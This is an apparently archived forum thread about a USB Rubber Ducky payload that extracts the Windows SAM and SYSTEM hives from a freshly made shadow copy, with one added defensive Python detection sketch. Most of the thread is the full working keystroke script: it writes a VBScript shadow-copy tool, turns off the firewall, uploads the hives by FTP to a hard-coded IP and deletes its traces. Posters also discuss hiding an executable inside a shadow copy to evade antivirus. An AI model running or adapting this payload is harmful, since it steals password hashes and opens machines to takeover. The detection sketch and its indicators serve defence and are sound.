[Question] Retrieve Sam And System From A Live File System


Xcellerator

Hi guys,

I read this article here, and thought that it'd work great as a Ducky Payload. I originally wrote it for my Teensy board (I don't have a USBRD) but then rewrote it for the Ducky. I admit it's not the cleanest code in the world (the Teensy version), but it works.

The delays are just a guide to work with MOST machines, but on a faster machine (a server for example, :o ), I'm sure you could reduce them greatly.

Here is the link to the code on the USBRD Wiki: LINK, and there is also a link to the pastebin with the Teensy version as well in the description.

Let me know what you think!

Yeah, I saw a demonstration of it and thought that it'd work brilliantly as payload...

I played a little bit with it.

For Rubberducky payloads it does not make that much sense, since we do everything by keyboard, and if we create an evil executable on the target system just by keyboard inputs we do not need to hide it; we want to execute it right now!

It might be interesting if you want to place the executable on the target system and then run it via a Scheduled task that you also setup with the ducky.

I think about the following:

1. Create executable via base64 encoding through VBScript in the windows\system32 folder

2. Place vssown.vbs on target system

3. Create a shadow copy

4. Delete your executable

5. Setup a scheduled task that calls vssown.vbs /execute \Windows\system32\evil.exe

The only advantage of this procedure would be that evil.exe is not visible for nearly 99% of users since no one would mount a Shadow Copy.

My opinion: Good idea but not so practical for the Ducky. Maybe if we could access the ducky's flash somehow it might be interesting in the future.

Cheers Peter

That's an interesting idea, and I would be very interested in incorporating that idea into a Metasploit Module. One of the most difficult things about binary dropping from Metasploit is AVs picking them up, and leaving tracks on the target. Although they can be removed upon successful exploitation, any errors can be fatal.

Also, has anyone checked to see if AVs do pick up on executables stored in a shadow copy? I'd be very surprised if they can...

Has anyone actually gotten this script to work? I've been trying it on my win7 box, but have had no luck.

What script do you mean? The vssown.vbs? It should work on a Win7 Box without any problems (administrative shell required).

Cheers

PCFreak

I had problems with it...

1) There are a couple of typos in the USBRD script:

"STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM ."

"STRING copy \\?\GLoBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM ."

2) My test box didn't have a "HarddiskVolumeShadowCopy1" so the script would fail, delete the .vbs files and exit without displaying the error.

I commented out the lines to exit and delete the vbs files and ran vssown.vbs /list to see if "1" existed and it did not. Every time the /create line runs it would increment (11, 12, 13) so I edited the payload to change "1" to the next expected shadowcopy# and then it finally copied the files.

Perhaps the payload should use /list to determine the next shadow created or try the next 25 #s if "HarddiskVolumeShadowCopy1" fails?

Here's the VSSown payload rebuilt... Instead of downloading VSSOwn, this payload builds a modified version of the vbs file (only the needed parts). It runs "/create c" five times. The reason for this is that each operating system typically already has 2-3 shadow copies, and we want a new shadow copy with the current hashes. In addition to pulling the SAM & SYSTEM files, this payload drops the firewall and sends the files to a remote FTP server. Sending these files via FTP (in the clear) on a pentest will likely get you sued; this is just an example of how to extract the data... This payload runs on Windows 7 w/UAC enabled. This payload will be added to the simple-ducky in the next update.

DELAY 2000
ESCAPE
DELAY 600
CONTROL ESCAPE
DELAY 600
STRING cmd
DELAY 600
MENU
DELAY 600
STRING a
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 800
STRING cd %USERPROFILE%
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING copy con vssown.vbs
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING strComputer = "."
ENTER
STRING Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
ENTER 
STRING Select Case args.Item(0)
ENTER 
STRING   Case "/start"
ENTER
STRING     Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
ENTER
STRING     For Each objService in colListOfServices
ENTER
STRING       objService.StartService()
ENTER
STRING       Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."
ENTER
STRING     Next
ENTER
STRING     wscript.Quit(0)
ENTER 
STRING   Case "/stop"
ENTER
STRING     Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
ENTER
STRING     For Each objService in colListOfServices
ENTER
STRING       objService.StopService()
ENTER
STRING       Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
ENTER
STRING     Next
ENTER
STRING     wscript.Quit(0) 
ENTER 
STRING   Case "/create"
ENTER
STRING     VOLUME = args.Item(1) & ":\"
ENTER
STRING     Const CONTEXT = "ClientAccessible"
ENTER
STRING     Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
ENTER
STRING     Wscript.Echo "[*] Attempting to create a shadow copy."
ENTER
STRING     errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
ENTER
STRING     wscript.Quit(errResult)
ENTER
STRING End Select
ENTER
CTRL z
ENTER
STRING cscript vssown.vbs /start
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM .
ENTER
DELAY 1000
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM .
ENTER
DELAY 1000
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING ftp
ENTER
DELAY 500
STRING open 192.168.10.109
ENTER
DELAY 800
STRING hacker
ENTER
DELAY 1000
STRING hacker
ENTER
DELAY 1000
STRING bin
ENTER
DELAY 800
STRING put SAM
ENTER
DELAY 800
STRING put SYSTEM
ENTER
DELAY 800
STRING quit
ENTER
DELAY 200
STRING DEL SAM
ENTER
STRING DEL SYSTEM
ENTER
STRING DEL vssown.vbs
ENTER
STRING exit
ENTER

~skysploit

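From the defender's side, the payload above leaves a recognisable trail in process-creation telemetry: a script driving VSS, a copy of config\SAM or config\SYSTEM out of a HarddiskVolumeShadowCopy path, the firewall being switched off, and ftp.exe starting. The following detection sketch is an added example, not code from this thread or from simple-ducky; the event format and the sample events are constructed, and the rule names are my own.

```python
import re
from collections import defaultdict

# Constructed process-creation events in a simplified "host|user|image|commandline"
# layout (Sysmon Event ID 1 style). Not real telemetry.
SAMPLE_EVENTS = [
    "WS01|CORP\\alice|C:\\Windows\\System32\\netsh.exe|netsh firewall set opmode disable",
    "WS01|CORP\\alice|C:\\Windows\\System32\\cscript.exe|cscript vssown.vbs /start",
    "WS01|CORP\\alice|C:\\Windows\\System32\\cscript.exe|cscript vssown.vbs /create c",
    "WS01|CORP\\alice|C:\\Windows\\System32\\cmd.exe|copy \\\\?\\GLOBALROOT\\Device"
    "\\HarddiskVolumeShadowCopy5\\windows\\system32\\config\\SAM .",
    "WS01|CORP\\alice|C:\\Windows\\System32\\ftp.exe|ftp",
    "WS02|CORP\\bob|C:\\Windows\\System32\\ftp.exe|ftp",          # lone ftp use, benign
    "WS02|CORP\\bob|C:\\Windows\\System32\\cmd.exe|copy C:\\Users\\bob\\report.docx D:\\",
]

# Command-line indicators taken directly from the payload in this thread.
RULES = {
    "shadow_copy_via_script": re.compile(r"vssown\.vbs\s+/(start|create|stop)\b", re.I),
    "hive_read_from_shadow_copy": re.compile(
        r"GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+\\.*\\config\\(SAM|SYSTEM)\b", re.I),
    "firewall_disabled": re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I),
}

def parse_event(line):
    host, user, image, cmdline = line.split("|", 3)
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}

def classify(events):
    """Collect indicators per host and assign a severity.
    Returns {host: (severity, sorted indicator names)} for hosts with at least one hit."""
    hits = defaultdict(set)
    for ev in map(parse_event, events):
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                hits[ev["host"]].add(name)
        if ev["image"].lower().endswith("\\ftp.exe"):   # clear-text exfil channel
            hits[ev["host"]].add("cleartext_ftp_client")
    result = {}
    for host, names in hits.items():
        if "hive_read_from_shadow_copy" in names:
            sev = "high"      # a user reading SAM/SYSTEM out of a snapshot has no benign reason
        elif {"shadow_copy_via_script", "firewall_disabled"} <= names:
            sev = "medium"    # staging without the hive copy seen (yet)
        elif len(names) >= 2:
            sev = "low"
        else:
            sev = "info"      # a single indicator, e.g. someone just using ftp
        result[host] = (sev, sorted(names))
    return result
```

Because the hive copy from the shadow-copy path is the decisive indicator, it alerts at high severity on its own even when the firewall and FTP steps are absent or replaced.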
  • 2 weeks later...

Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network!

Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a truecrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..!

Edited by Xcellerator
Download the latest version of the simple-ducky (v1.1.0): https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.0_debian.sh&can=2&q=

It has a modified version of this payload which uses 7za to AES256 encrypt the extracted files prior to sending them over ftp. It also has a built in hasher and custom wordlist builder. So say if you are pentesting company X, you can download their website and generate a password list based on every word extracted. You are then prompted with the option to merge the new list with the default list in John.

~skysploit
